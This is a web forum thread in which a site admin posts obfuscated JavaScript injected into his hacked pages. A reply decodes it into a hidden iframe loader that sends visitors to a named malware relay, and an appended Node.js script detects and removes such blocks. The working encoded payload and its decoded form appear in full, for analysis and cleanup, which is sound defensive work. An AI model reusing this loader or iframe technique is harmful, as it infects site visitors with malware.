Thread: Help With deciphering Code...

  1. #1
    Junior Member
    Join Date
    May 2013
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default Help With deciphering Code...

    Hello Cafe Members,

    Let me start off by saying I'm not a Java coder and not proficient with coding at all. I admin a few websites and do HTML mostly. I recently was advised that the FTP password was compromised on a site and when looking at the HTML, all the files were injected with this code (also attached)...

    <!--0c0896--><script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          sp="split";w=window;aq="0"+"x";ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,67,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,67,5d,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,62,66,6c,6a,66,60,65,69,70,66,25,65,5c,6b,26,69,5c,63,58,70,25,67,5f,67,1e,32,4,1,17,67,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,67,5d,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,67,5d,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,67,5d,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,67,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,67,5d,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,67,5d,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,67,5d,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,67,5d,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,67,5d,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,
69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,6
6,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i+1305!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}za=e;za(s)}</script><!--/0c0896-->


    I'm trying to figure out exactly what it does and the potential damage. Thanks to any that are willing to help.


  2. #2
    Crazy Cat Lady KevinWorkman's Avatar
    Join Date
    Oct 2010
    Location
    Washington, DC
    Posts
    5,424
    My Mood
    Hungover
    Thanks
    144
    Thanked 636 Times in 540 Posts

    Default Re: Help With deciphering Code...

    Java and javascript are completely different, but I recommend giving this a read: Beating JavaScript obfuscators with Firebug
    Useful links: How to Ask Questions the Smart Way | Use Code Tags | Java Tutorials
    Static Void Games - Play indie games, learn from game tutorials and source code, upload your own games!

  3. #3
    Junior Member
    Join Date
    May 2013
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default Re: Help With deciphering Code...

    Originally posted by KevinWorkman:
    Java and javascript are completely different, but I recommend giving this a read: Beating JavaScript obfuscators with Firebug

    Thank you for the direction, it's a great start.

  4. #4
    Junior Member
    Join Date
    Jun 2013
    Posts
    1
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default Re: Help With deciphering Code...

    This is an exploit that has been going around for a couple of weeks. Notice the '0c0896' (the hacker's "tag"). You can search "0c0896 hack" online for more forum posts and information.

    Hard to read code all on one line (that was the intent)

    So using jsbeautifier

    We get:
    sp = "split";
    w = window;
    aq = "0" + "x";
    ff = String;
    z = "y";
    ff = ff.fromCharCode;
    try {
        document["\x62od" + z] ^= ~1;
    } catch (d21vd12v) {
        v = 123;
        vzs = false;
        try {
            document;
        } catch (wb) {
            vzs = 2;
        }
        if (!vzs) e = w["eval"];
        if (1) {
            f = "17,5d,6c,65,5a,6b,60,...,4,1,74,4,1" [sp](",");
        }
        w = f;
        s = [];
        for (i = 2 - 2; - i + 1305 != 0; i += 1) {
            j = i;
            if ((031 == 0x19))
                if (e) s = s + ff(e(aq + (w[j])) + 9);
        }
        za = e;
        za(s)
    }

    Now this is pretty easy to decipher. Mainly we replace all the variables back and instead of executing the window["eval"] we just paste the string using document.write and paste it between some <pre> tags:
    function zzzfff() {
        var pf = document.createElement('iframe');
     
        pf.src = '--REMOVED--';
        pf.style.position = 'absolute';
        pf.style.border = '0';
        pf.style.height = '1px';
        pf.style.width = '1px';
        pf.style.left = '1px';
        pf.style.top = '1px';
     
        if (!document.getElementById('pf')) {
            document.write('<div id=\'pf\'></div>');
            document.getElementById('pf').appendChild(pf);
        }
    }
     
    function SetCookie(cookieName, cookieValue, nDays, path) {
        var today = new Date();
        var expire = new Date();
        if (nDays == null || nDays == 0) nDays = 1;
        expire.setTime(today.getTime() + 3600000 * 24 * nDays);
        document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    }
     
    function GetCookie(name) {
        var start = document.cookie.indexOf(name + "=");
        var len = start + name.length + 1;
        if ((!start) &&
            (name != document.cookie.substring(0, name.length))) {
            return null;
        }
        if (start == -1) return null;
        var end = document.cookie.indexOf(";", len);
        if (end == -1) end = document.cookie.length;
        return unescape(document.cookie.substring(len, end));
    }
    if (navigator.cookieEnabled) {
        if (GetCookie('visited_uq') == 55) {} else {
            SetCookie('visited_uq', '55', '1', '/');
     
            zzzfff();
        }
    }

    So it sets a cookie, and visits the URL for the site: "kousoinryo dot net slash relay dot php" listed above (and removed) but I don't advise visiting the site. It will attempt to install malware. It also acts as a "counter" for the hacker to keep track of what browsers, IPs, and referrers he is getting.
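
The decoding step described in post #4 can also be done statically, without running the injected script in a browser. The following is an added example, not part of the original thread: it finds blocks wrapped in paired marker comments, decodes the hex list as data (hex value plus 9, never calling eval), defangs any URLs, and strips the block from the page. The function names, the sample page and the `malicious.example` host are constructed for illustration.

```javascript
'use strict';

// Paired marker comments wrap the injected script: <!--0c0896--> ... <!--/0c0896-->
const BLOCK_RE = /<!--([0-9a-f]{6})-->([\s\S]*?)<!--\/\1-->/g;
// The payload is one quoted, comma-separated list of hex byte values.
const HEX_LIST_RE = /"((?:[0-9a-f]{1,2},){20,}[0-9a-f]{1,2})"/i;

// Decode the list the way the loader does (parse hex, add offset), as data only.
function decodeHexList(list, offset) {
  return list.split(',')
    .map((h) => String.fromCharCode(parseInt(h, 16) + offset))
    .join('');
}

// Rewrite URLs so they cannot be clicked or fetched by accident.
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

// Return one finding per injected block: tag, decoded source, defanged URLs.
function triage(html, offset = 9) {
  const findings = [];
  for (const m of html.matchAll(BLOCK_RE)) {
    const hex = HEX_LIST_RE.exec(m[2]);
    const decoded = hex ? decodeHexList(hex[1], offset) : null;
    const urls = decoded ? (decoded.match(/https?:\/\/[^\s'"<>]+/gi) || []) : [];
    findings.push({ tag: m[1], decoded, urls: urls.map(defang) });
  }
  return findings;
}

// Remove every injected block so the cleaned file can be diffed and redeployed.
function stripInjected(html) {
  return html.replace(BLOCK_RE, '');
}

// Constructed sample only: a harmless line encoded with the same scheme.
function encodeSample(src) {
  return [...src].map((c) => (c.charCodeAt(0) - 9).toString(16)).join(',');
}
const samplePayload = "pf.src = 'http://malicious.example/relay.php';\r\n";
const samplePage = '<html><body>Hi</body><!--0c0896--><script>f="' +
  encodeSample(samplePayload) + '"[sp](",");</script><!--/0c0896--></html>';

const [finding] = triage(samplePage);
console.log(finding.tag, JSON.stringify(finding.decoded), finding.urls);
console.log(stripInjected(samplePage));
```

Run it with Node.js against a copy of each affected file; the 6-character tag differs between campaigns, which is why the pattern matches any paired hex tag rather than only `0c0896`.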
